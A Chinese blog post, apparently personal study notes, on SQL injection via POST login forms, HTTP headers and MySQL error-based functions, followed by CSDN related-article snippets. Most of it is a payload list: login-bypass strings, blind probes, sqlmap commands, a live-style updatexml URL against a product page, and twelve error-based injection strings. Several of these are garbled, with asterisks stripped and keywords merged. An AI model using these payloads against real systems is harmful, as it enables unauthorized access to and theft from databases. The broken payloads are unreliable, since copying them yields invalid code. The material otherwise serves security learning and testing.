sql注入——post,head,报错注入

最新推荐文章于 2024-03-30 12:21:53 发布
最新推荐文章于 2024-03-30 12:21:53 发布
阅读量294 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33441500/article/details/103041560
版权

 

sql注入——post,head,报错注入

一,POST注入
post注入高危点:
登录框
查询框
各类与数据库有交互框
经典的万能密码
'or 1=1#
在这里插入图片描述
post注入跟get注入都差不多
那我们先判断先字段数
输入’order by 3#
在这里插入图片描述
联合查询
在这里插入图片描述
查询数据库名
在这里插入图片描述
post注入检测方式还有两种
1,使用sqlmap -u url --forms
在这里插入图片描述
在这里插入图片描述
2,使用抓包工具抓包另存为1.txt并在存在注入的地方使用*标记
sqlmap -r 1.txt 此处的1.txt和sqlmap在同一目录
后面也可跟绝对1.txt的绝对路径
常用的万能username语句:
a ’ or 1=1 #
a ") or 1=1 #
a‘) or 1=1 #
a” or “1”=”1
’ or ‘1’='1
’ or (length(database())) = 8 (用于输入’ “都没有错误)
’ or (ascii(substr((select database()) ,1,1))) = 115 # (用于输入’ “都没有错误)
") or (“1”)=("1
") or 1=1 or if(1=1, sleep(1), null) #
") or (length(database())) = 8 #
") or (ascii(substr((select database()) ,1,1))) = 115 or if(1=1, sleep(1), null) #
二,head注入
在php中存在用来存储数据的变量
php中有一些预定义超全局变量
$_REQUEST(获取get,post,cookie传参)新版本中不支持cookie传参
$_POST
$_GET
$_COOKIE
$_SERVER(包含了注入头信息,路径,以及脚本位置等信息)
$_SERVER[‘HTTP_HOST’]请求头信息中的host内容,获取当前域名
$_SERVER[‘HTTP_USER_AGENT’]获取用户相关信息,包括用户浏览器,操作系统等
$_SERVER[‘REMOTE_ADDR’]浏览用户的ip
记得学个php

<?php
	$a=$_SERVER['HTTP_HOST'];
	$b=$_SERVER['HTTP_USER_AGENT'];
	$c=$_SERVER['REMOTE_ADDR'];
	var_dump($a);
echo "<br>";
	var_dump($b);
echo "<br>";
    var_dump($c);
echo "<br>";
?>

在这里插入图片描述
访问后得到了这些数据

三,报错注入
报错注入使用的函数有哪些
updatexml(目标xml内容,xml文件路径,更新内容)
updatexml(1,concat(0x7e,(select database()),0x7e),1)
在这里插入图片描述
实战例句
http://www.xxxx.com.cn/product/index/id/10%20and%20updatexml(1,concat(0x7e,(select%20user()),0x7e),1)%23
在这里插入图片描述

1、通过floor报错,注入语句如下:
and select 1 from (select count(),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a);

2、通过ExtractValue报错,注入语句如下:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

3、通过UpdateXml报错,注入语句如下:
and 1=(updatexml(1,concat(0x3a,(select user())),1))

4、通过NAME_CONST报错,注入语句如下:
and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)

5、通过join报错,注入语句如下:
select * from(select * from mysql.user ajoin mysql.user b)c;

6、通过exp报错,注入语句如下:
and exp(~(select * from (select user () ) a) );

7、通过GeometryCollection()报错,注入语句如下:
and GeometryCollection(()select *from(select user () )a)b );

8、通过polygon ()报错,注入语句如下:
and polygon (()select * from(select user ())a)b );

9、通过multipoint ()报错,注入语句如下:
and multipoint (()select * from(select user() )a)b );

10、通过multlinestring ()报错,注入语句如下:
and multlinestring (()select * from(selectuser () )a)b );

11、通过multpolygon ()报错,注入语句如下:
and multpolygon (()select * from(selectuser () )a)b );

12、通过linestring ()报错,注入语句如下:
and linestring (()select * from(select user() )a)b );

 

-stem-
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Header:请求头参数详解
panying1的博客
12-08 2639
Header 解释 示例 Accept 指定客户端能够接收的内容类型 Accept: text/plain, text/html,application/json Accept-Charset 浏览器可以接受的字符编码集。 Accept-Charset: iso-8859-5 Accept-Encoding 指定浏览器可以支持的web服务器返回内
sql注入-注入
课嗨教育的专栏
04-29 780
渗透测试基础课-课程进度_不死的小鱼的博客-CSDN博客 1.什么是注入 mysql_error 2.我们在什么情况下使用注入 在页面返回连误信息的时候 3.函数 updatexml //5.1版本以上使用 extrachvalue floor //5.0版本之前也可以使用 请求:http://localhost/Less-1/index.php?id=1%27 // %27是英文单引号的url编码,是被浏览器自动编码的 %20 是空格 返回:1' LIMIT 0,1 htt...
渗透测试基础-HEAD注入
weixin_45488495的博客
04-08 1013
渗透测试基础-HEAD注入PHP的超全局变量 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 在讲解HEAD注入前,得明白一些前提知识:PHP的超全局变量 PHP的超全局变量 在php中的许多预定义变量都是“超全局的”,这意味着他们在一个脚本的全部作用域中都可以使用。 创建的一些超全局变量: $_REQUEST (获取GET/POST/COOKIE) COOKIE在新版本已经无法获取 $_POST (获取POST传参) $_GET (获
HEAD注入-(掌控安全)
weixin_74410605的博客
07-15 224
其次从上图②处的sql语句中单引号闭合的$uagent结合①处可以得出,注入点是USER_AGENT。分析之后就可以打开burpsuite开始抓包,如下图,发送至repeater。在我们传参时,后端为了验证或者获取客户端的一些信息,将这些信息存入到数据库但没有进行相关的处理,所以存在了注入。除了本关考点告诉我们是head注入,还可以从源码的全局变量猜测出是head注入。发现存在延时注入,从而进一步确认USER_AGENT是注入点。接着查询表名,发现有个表名是flag_head。查询flag_h1里的内容。
掌控安全 -- header注入
qq_51802152的博客
12-04 2381
HEADER注入
SQL注入POST注入HEAD注入
qq_68233961的博客
07-10 1321
SQL注入POST注入HEAD注入
sql注入——sqlserver注入
cxrpty的博客
02-12 5960
注入的条件是必须有信息 用到函数convert(int,(select top 1 db_name() )),其含义是将第二个参数的值转换成第一个参数的int类型 一、打开文件,如下图所示,有信息: 二、查看数据库 输入:http://192.168.1.106/1.php?id=1 and 1=convert(int,(select top 1 db_name()));这里...
SQL注入——mssql注入
01-19
可以在 SQL Server 中执行任何活动。 serveradmin  可以设置服务器范围的配置选项,关闭服务器。 setupadmin 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
渗透测试基础-Head注入
学习、分享、交流
05-16 857
前提:目标网址会记录你的一些head信息,放进数据库,那么只要放进数据库,就说明与数据库产生了交互。 --> 可能就存在数据库注入漏洞。
head注入(一)
qq_45300786的博客
07-06 3576
head(一) 注入环境:http://inject2.lab.aqlab.cn:81/Pass-07/index.php 攻击流程:     1;正确登录时用burp抓包。     2;测试head部分是否存在漏洞。     3;获取信息。   测试开始:     测试目标获取管理员账号密码     一些需要提前掌握的函数 order by 原为排序,注入式用来判断字段数 union select 用来判断显示位置,和链表查询(需相同字段数量) information_schema mysql自带数据库
sql 注入的类型之 post 基于误的注入sqllib靶场less-11-12)(通过burpusite分析)
weixin_74182283的博客
03-30 1237
post注入和get注入一样,都是基于数据库没有对语句进行足够多的过滤,导致用户可以直接在url上执行sql语句。这两基本上没区别,但是基于post注入在真实情况下会比get的多得多,最典型的post注入就是万能密码。
POST注入注入(封神台靶场绕过getshell题目)
qq_66013948的博客
09-19 124
接下来,我们就可以开始进行注入了,先将user的值进行闭合,也就是'--(空格),之后,再发送一次,会出现密码误(用户为admin时)或者不存在该管理用户(用户名为误的时候),之后,我们可以在' 后面,--前面构造order by来判断字段数,当字段数为6的时候,出现了数据库操作失败,那么可以知道的是,这里边有5个字段。二.对于封神台第一题,我们就是在url上面动的手脚,这个可以叫做手动注入,也可以叫做GET注入,那么,除了GET注入之外,我们可以试着利用一下POST注入。查看一下的是不是。
post注入注入学习笔记
XiaoXiao_RenHe的专栏
04-24 2848
post注入注入学习笔记
【Less-13】POST注入注入
ssrf
11-02 235
文章目录一、测试注入点二、注入 一、测试注入点 这关只有输入为真回显字母为蓝色,假为红色,也会,所以可以用和盲注。这里是用')来闭合 uname=admin') or '1'='1'#&passwd=admin&submit=Submit 这里使用注入,具体步骤查看: https://blog.csdn.net/weixin_44032232/article/details/109314974 二、注入 uname=admin') and updatexml(1,
7.15 陇东学院云计算1班 马陆辉 20240715
最新发布
07-15
练习题

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值